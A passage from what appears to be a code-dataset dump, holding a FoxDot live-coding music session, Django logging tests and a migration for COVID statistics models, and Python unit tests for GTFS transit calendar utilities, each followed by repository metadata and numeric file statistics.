d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,room=0.5,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,room=0.5,pan=[-1,1],)
d1 >> play("x-",)
d1 >> play("xn",)
d1 >> play("xn",sample=[0,PRand(5)],)
d1 >> play("xn",sample=[0,PRand(7)],)
d1 >> play("xn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3)
b1 >> bass(dur=8,)
b1 >> bass([0,0.5],dur=4,)
b1 >> bass([0,0.5],dur=4,oct=4,)
b1 >> bass([0,0.5],dur=4,oct=3,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=1,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=-1,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3]),coarse=16,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3]),coarse=PRand([4,8,16]),)
d3 >> play(" u ")
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0,64]),)
d3 >> play(Pvar([" u "," u u"],8),dur=PDur(var([4,5],8),8),)
d3 >> play(Pvar([" u "," u u"],8),dur=PDur(var([4,5],16),8),)
d1 >> play("xn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
Master().lpf = var([0,200],[28,4])
p1 >> pads(dur=8,room=1,chop=320,coarse=16) + (P*(0,4,4.5,[0.5,5]))
Root.default = var([0,2],64)
Master().lpf = var([0,100],[28,4])
Master().lpf = var([0,1000],[28,4])
Master().lpr = linvar([0.1,1])
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0,64,13]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0,64])*PRand([1,1.5]),)
c1 >> play("#",dur=8,)
c1 >> play("#",dur=8,bits=4,)
c1 >> play("#",dur=8,bits=4,cut=1/2,)
c1 >> play("#",dur=8,bits=4,cut=1/2,room=1,)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,crush=1,)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,crush=1,shape=0.5,)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,crush=1,shape=0.5,pan=[-1,1],)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,crush=1,shape=0.5,pan=[-1,1],slide=-1,)
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=1,shape=0.5,pan=[-1,1],slide=-1,)
c1.solo()
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,room=0.5,pan=[-1,1],)
d1 >> play("xn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=2,)
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=PRand(8),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0,64])*PRand([1,1.5]),)
d3 >> play(Pvar([" u "," u u"],8),dur=PDur(var([4,5],16),8),)
p1 >> pads(dur=8,room=1,chop=320,coarse=16) + (P*(0,4,4.5,[0.5,5]))
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=PRand(8)*10,)
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=PRand(8)+10,)
s1 >> saw(PWhite(32),dur=1/4,)
s1 >> saw(PWhite(32),dur=1/6,)
s1 >> pulse(PWhite(32),dur=1/6,)
s1 >> pulse(PWhite(32),dur=1/6,fmod=10,)
s1 >> pulse(PWhite(32),dur=1/6,fmod=10,oct=4,)
Group(s1, b1).only()
s1 >> pulse(PWhite(32)[:8],dur=1/4,fmod=10,oct=4,)
d4 >> play("funky",rate=10,)
d4 >> play("funky",rate=10,dur=1/4,)
d4 >> play("funky",rate=4,dur=1/4,)
d4 >> play("funky",rate=4*PRand([1,1.5]),dur=1/4,)
d4 >> play("funky",rate=4*PRand([1,1.5,1.25]),dur=1/4,)
d4 >> play("funky",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
#### > run block <
d1 >> play("xn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,room=0.5,pan=[-1,1],)
d3 >> play(Pvar([" u "," u u"],8),dur=PDur(var([4,5],16),8),)
b1.stop()
#### > run block <
s1 >> pulse(PWhite(32)[:8],dur=1/4,fmod=10,oct=3,)
s1 >> pulse(PWhite(32)[:8],dur=1/4,fmod=10,oct=3,) + var([0,(0,4)],[12,4])
s1 >> pulse(PWhite(32)[:8],dur=1/4,fmod=10,oct=4,) + var([0,(0,4)],[12,4])
Root.default = 0
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=PRand(8)+10,)
d4 >> play("<funky>< m>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< w>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< (mw)l>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< (ew)l>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< (+t)l>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< (+q)l>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
p1 >> pads(dur=8,room=1,chop=320,coarse=16) + (P*(0,4,4.5,[0.5,5]))
s1.every(8,"degrade")
s1.stop()
d3 >> play("*",sample=2,dur=1/4,amp=PRand(2)[:16],)
d3 >> play("*",sample=2,dur=1/4,amp=PRand(2)[:16],pan=[-1,1],)
d3 >> play("*",sample=2,dur=1/4,amp=PRand(2)[:16],pan=[-1,0,1],)
d3 >> play("*",sample=2,dur=1/4,amp=PRand(2)[:16],pan=[-1,0,1],rate=var([1,2]))
d1 >> play("Vn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
d1 >> play("<Vn>< u >",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
p1 >> pads(dur=8,room=1,chop=320,coarse=16,lpf=linvar([500,1000],24),) + (P*(0,4,4.5,[0.5,5]))
p1 >> pads(dur=8,room=1,chop=320,coarse=16,lpf=linvar([500,1000],24),lpr=linvar([0.1,1],14),) + (P*(0,4,4.5,[0.5,5]))
p1 >> pads(dur=8,room=1,chop=320,coarse=16,lpf=linvar([500,800],24),lpr=linvar([0.1,1],14),) + (P*(0,4,4.5,[0.5,5]))
p1 >> pads(dur=8,room=1,chop=320,coarse=16,lpf=linvar([400,800],24),lpr=linvar([0.1,1],14),) + (P*(0,4,4.5,[0.5,5]))
p1 >> pluck(dur=8,room=1,chop=320,coarse=16,lpf=linvar([400,800],24),lpr=linvar([0.1,1],14),) + (P*(0,4,4.5,[0.5,5]))
d_all.amplify = var([1,0],[28,4])
p2 >> blip(dur=12,)
p2 >> blip(dur=12,fmod=10,)
p2 >> blip(dur=12,fmod=4,)
p2 >> blip(dur=12,fmod=4,vib=12,)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P*(-1,0,1),)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,) + (0,9)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,) + (0,2)
d_all.stop()
# p2 >> blip(dur=12,fmod=4,vib=12,slide=(-1,-2,-3),oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,) + (0,2)
# p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,) + (0,2)
# DefaultServer.freeAllNodes()
d1 >> play("n",dur=1/4,sample=PRand(7),)
d1 >> play("n",dur=1/4,sample=PRand(7),pan=PWhite(-1,1),)
d1 >> play("n",dur=1/4,sample=PRand(7)+PStep(7,P*(0,1)),pan=PWhite(-1,1),)
d2 >> play("(X )( X)O ",)
d2 >> play("(X )( X)O ",rate=(0.9,1),pan=(-1,1),)
d2 >> play("(X )( X)O ",rate=(0.9,1),pan=(-1,1),).every(6,"stutter")
d2 >> play("(X )( X)O ",rate=(0.9,1),pan=(-1,1),).every(6,"stutter",n=4,dur=3)
d2 >> play("<s><(X )( X)O >",rate=(0.9,1),pan=(-1,1),).every(6,"stutter",n=4,dur=3)
d2 >> play("< s><(X )( X)O >",rate=(0.9,1),pan=(-1,1),).every(6,"stutter",n=4,dur=3)
d_all.lpf = 500
d_all.lpf = 0
d3 >> play("[oo]",amp=linvar([0,1],[32,0]),)
d4 >> play("#",dur=32,)
nextBar(Clock.clear)  # pass the function so the clear runs at the next bar
| 44.315534
| 117
| 0.56326
| 2,132
| 9,129
| 2.409475
| 0.076454
| 0.016741
| 0.022387
| 0.024917
| 0.857115
| 0.84232
| 0.818182
| 0.809422
| 0.802803
| 0.761145
| 0
| 0.160674
| 0.076898
| 9,129
| 205
| 118
| 44.531707
| 0.448914
| 0.080294
| 0
| 0.129496
| 0
| 0
| 0.051712
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bc2100eb8f2f2b395cb3343c8b2aba045380fbe2
| 146
|
py
|
Python
|
sel_map_segmentation/sel_map_segmentation/src/sel_map_segmentation/__init__.py
|
roahmlab/sel_map
|
51c5ac738eb7475f409f826c0d30f555f98757b3
|
[
"MIT"
] | 2
|
2022-02-24T21:10:32.000Z
|
2022-03-11T20:00:09.000Z
|
sel_map_segmentation/sel_map_segmentation/src/sel_map_segmentation/__init__.py
|
roahmlab/sel_map
|
51c5ac738eb7475f409f826c0d30f555f98757b3
|
[
"MIT"
] | null | null | null |
sel_map_segmentation/sel_map_segmentation/src/sel_map_segmentation/__init__.py
|
roahmlab/sel_map
|
51c5ac738eb7475f409f826c0d30f555f98757b3
|
[
"MIT"
] | null | null | null |
from .cameraSensor import CameraSensor
from .cameraSensor import Pose
from .BypassWrapper import BypassWrapper
from .ColorScale import ColorScale
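# Usage sketch (an illustration, not part of the package): these re-exports
# let callers import from the package root, e.g.
#     from sel_map_segmentation import CameraSensor, Pose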
| 29.2
| 40
| 0.863014
| 16
| 146
| 7.875
| 0.375
| 0.253968
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 146
| 4
| 41
| 36.5
| 0.969231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 8
| bc3741ae59723e743ecd5a9b041ebac17e32bcf0
| 3,235
| py
| Python
| log_storage/tests.py
| Virtualstock/log_storage
| cebc78263008d626ae732330dd61517e00101c0b
| ["MIT"]
| 1
| 2018-10-10T08:59:23.000Z
| 2018-10-10T08:59:23.000Z
| log_storage/tests.py
| Virtualstock/log_storage
| cebc78263008d626ae732330dd61517e00101c0b
| ["MIT"]
| 3
| 2019-05-23T12:42:43.000Z
| 2021-02-09T12:28:04.000Z
| log_storage/tests.py
| Virtualstock/log_storage
| cebc78263008d626ae732330dd61517e00101c0b
| ["MIT"]
| 1
| 2018-10-10T08:14:51.000Z
| 2018-10-10T08:14:51.000Z
# -*- coding: UTF-8 -*-
import logging
import django.test as unittest
from log_storage.models import Log
class TestLogRecordingToFile(unittest.TestCase):
def setUp(self):
self.log = Log(save_file=True)
self.logger = logging.getLogger("test." + __name__)
self.logger.setLevel(logging.DEBUG)
def test_logging(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_persistence(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.log = Log.objects.get(pk=self.log.pk)
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_persistence_backward_compatibility(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.log = Log.objects.get(pk=self.log.pk)
self.assertTrue(self.log.filename.startswith("logs/"))
self.log.filename = self.log.filename[5:]
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_log_data(self):
"""Test that calling log.log_data before logging anything won't throw error."""
self.assertEqual("", self.log.log_data)
def test_logging_unicode(self):
with self.log:
self.logger.info(u"инфо")
self.logger.debug(u"дебуг")
self.log = Log.objects.get(pk=self.log.pk)
self.assertIn(u"инфо", self.log.log_data)
self.assertIn(u"дебуг", self.log.log_data)
class TestLogRecordingToDb(unittest.TestCase):
def setUp(self):
self.log = Log(save_file=False)
self.logger = logging.getLogger("test." + __name__)
self.logger.setLevel(logging.DEBUG)
def test_logging(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_persistence(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.log = Log.objects.get(pk=self.log.pk)
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_log_data(self):
"""Test that calling log.log_data before logging anything won't throw error."""
self.assertEqual("", self.log.log_data)
def test_logging_unicode(self):
with self.log:
self.logger.info(u"инфо")
self.logger.debug(u"дебуг")
self.log = Log.objects.get(pk=self.log.pk)
self.assertIn(u"инфо", self.log.log_data)
self.assertIn(u"дебуг", self.log.log_data)
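# Editor's sketch of the context-manager pattern these tests exercise. This is
# a hypothetical stand-in, not the real log_storage.models.Log (which also
# persists through the Django ORM): entering attaches a capturing handler,
# exiting detaches it, and `log_data` exposes the captured text. The formatter
# includes %(name)s, which is why the logger name shows up in log_data.
import io
import logging

class CapturingLog(object):
    def __enter__(self):
        self._buffer = io.StringIO()
        self._handler = logging.StreamHandler(self._buffer)
        self._handler.setFormatter(logging.Formatter("%(name)s %(message)s"))
        logging.getLogger().addHandler(self._handler)
        return self

    def __exit__(self, *exc_info):
        logging.getLogger().removeHandler(self._handler)

    @property
    def log_data(self):
        return self._buffer.getvalue()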
| 35.549451
| 87
| 0.632767
| 451
| 3,235
| 4.419069
| 0.128603
| 0.151029
| 0.140492
| 0.147516
| 0.884596
| 0.884596
| 0.884596
| 0.884596
| 0.884596
| 0.884596
| 0
| 0.000802
| 0.228748
| 3,235
| 90
| 88
| 35.944444
| 0.797996
| 0.05255
| 0
| 0.859155
| 0
| 0
| 0.082187
| 0.036018
| 0
| 0
| 0
| 0
| 0.309859
| 1
| 0.15493
| false
| 0
| 0.042254
| 0
| 0.225352
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| cb292478e32043cbbbdc08a000de11525a6de8dd
| 4,769
| py
| Python
| app/core/migrations/0014_basecountrystats_chinacovidstats_francecovidstats_germanycovidstats_irancovidstats_italycovidstats_r.py
| mzs9540/covid19
| efe8b6e243f576f728a91fc5cde00b1ac0990ac1
| ["MIT"]
| 1
| 2020-04-27T15:20:15.000Z
| 2020-04-27T15:20:15.000Z
| app/core/migrations/0014_basecountrystats_chinacovidstats_francecovidstats_germanycovidstats_irancovidstats_italycovidstats_r.py
| mzs9540/covid19
| efe8b6e243f576f728a91fc5cde00b1ac0990ac1
| ["MIT"]
| null | null | null
| app/core/migrations/0014_basecountrystats_chinacovidstats_francecovidstats_germanycovidstats_irancovidstats_italycovidstats_r.py
| mzs9540/covid19
| efe8b6e243f576f728a91fc5cde00b1ac0990ac1
| ["MIT"]
| 1
| 2020-05-30T13:55:22.000Z
| 2020-05-30T13:55:22.000Z
# Generated by Django 3.0.5 on 2020-04-29 10:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0013_auto_20200429_0516'),
]
operations = [
migrations.CreateModel(
name='BaseCountryStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('confirmed', models.IntegerField()),
('recovered', models.IntegerField()),
('deaths', models.IntegerField()),
],
),
migrations.CreateModel(
name='ChinaCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='FranceCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='GermanyCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='IranCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='ItalyCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='RussiaCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='SpainCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='TurkeyCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='UKCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='UkraineCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='UsCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
]
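# Editor's sketch (a hypothetical reconstruction; the real definitions live in
# the app's models.py): this migration is what Django generates for concrete
# multi-table inheritance, namely a base model holding the shared columns plus
# an empty subclass per country, each linked back by an automatic OneToOneField
# (the explicit basecountrystats_ptr fields above).
from django.db import models

class BaseCountryStats(models.Model):
    date = models.DateField()
    confirmed = models.IntegerField()
    recovered = models.IntegerField()
    deaths = models.IntegerField()

class ChinaCovidStats(BaseCountryStats):
    pass  # one empty subclass per country yields the CreateModel blocks above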
| 46.754902
| 208
| 0.613965
| 428
| 4,769
| 6.698598
| 0.151869
| 0.153471
| 0.058598
| 0.092082
| 0.808162
| 0.808162
| 0.797
| 0.797
| 0.797
| 0.797
| 0
| 0.008757
| 0.257706
| 4,769
| 101
| 209
| 47.217822
| 0.80113
| 0.009436
| 0
| 0.736842
| 1
| 0
| 0.195256
| 0.102711
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021053
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| cb6d81ab55f4eb87990716d2cb15855f9af586ec
| 24,509
| py
| Python
| utilities/test/test_temporal_utils.py
| MobilityData/mobility-database-interface
| c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
| ["Apache-2.0"]
| 4
| 2021-03-12T10:40:47.000Z
| 2022-01-11T10:56:53.000Z
| utilities/test/test_temporal_utils.py
| MobilityData/mobility-database-interface
| c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
| ["Apache-2.0"]
| 181
| 2021-03-09T15:27:51.000Z
| 2022-01-31T15:25:28.000Z
| utilities/test/test_temporal_utils.py
| MobilityData/mobility-database-interface
| c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
| ["Apache-2.0"]
| null | null | null
from datetime import datetime
import pandas as pd
from unittest import TestCase, mock
from unittest.mock import MagicMock, PropertyMock
from gtfs_kit.feed import Feed
from utilities.temporal_utils import *
class TestTemporalUtils(TestCase):
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_dataset_with_none_calendars_should_return_empty_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(return_value=None)
mock_calendar_dates = PropertyMock(return_value=None)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "test_type"
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 1)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 1)
mock_date_type.assert_not_called()
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_none_date_type_and_calendar_dates_should_return_empty_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(
return_value=pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [0],
"tuesday": [0],
"wednesday": [0],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [0],
"service_id": ["test_service_id"],
}
)
)
mock_calendar_dates = PropertyMock(return_value=None)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
under_test = get_gtfs_dates_by_type(mock_dataset, None)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 1)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 1)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_invalid_type_and_none_calendar_dates_should_return_empty_frame(
self, mock_dataset
):
mock_calendar = PropertyMock(
return_value=pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [0],
"tuesday": [0],
"wednesday": [0],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [0],
"service_id": ["test_service_id"],
}
)
)
mock_calendar_dates = PropertyMock(return_value=None)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "invalid_type"
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 1)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 1)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_calendar_and_none_calendar_dates_should_return_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(
return_value=pd.DataFrame(
{
"start_date": ["20201010"],
"monday": [0],
"tuesday": [0],
"wednesday": [0],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [0],
"service_id": ["test_service_id"],
}
)
)
mock_calendar_dates = PropertyMock(return_value=None)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "start_date"
test_dataframe = pd.DataFrame(
{"service_id": ["test_service_id"], "date": ["20201010"]}
)
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(
under_test["service_id"].all(), test_dataframe["service_id"].all()
)
self.assertEqual(under_test["date"].all(), test_dataframe["date"].all())
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 2)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 1)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_calendar_dates_with_exception_1_should_return_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(return_value=None)
mock_calendar_dates = PropertyMock(
return_value=pd.DataFrame(
{
"date": ["20201010"],
"exception_type": [1],
"service_id": ["test_service_id"],
}
)
)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "start_date"
test_dataframe = pd.DataFrame(
{"service_id": ["test_service_id"], "date": ["20201010"]}
)
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(
under_test["service_id"].all(), test_dataframe["service_id"].all()
)
self.assertEqual(under_test["date"].all(), test_dataframe["date"].all())
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 1)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 2)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_calendar_dates_with_exception_2_should_return_empty_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(
return_value=pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [0],
"tuesday": [0],
"wednesday": [0],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [0],
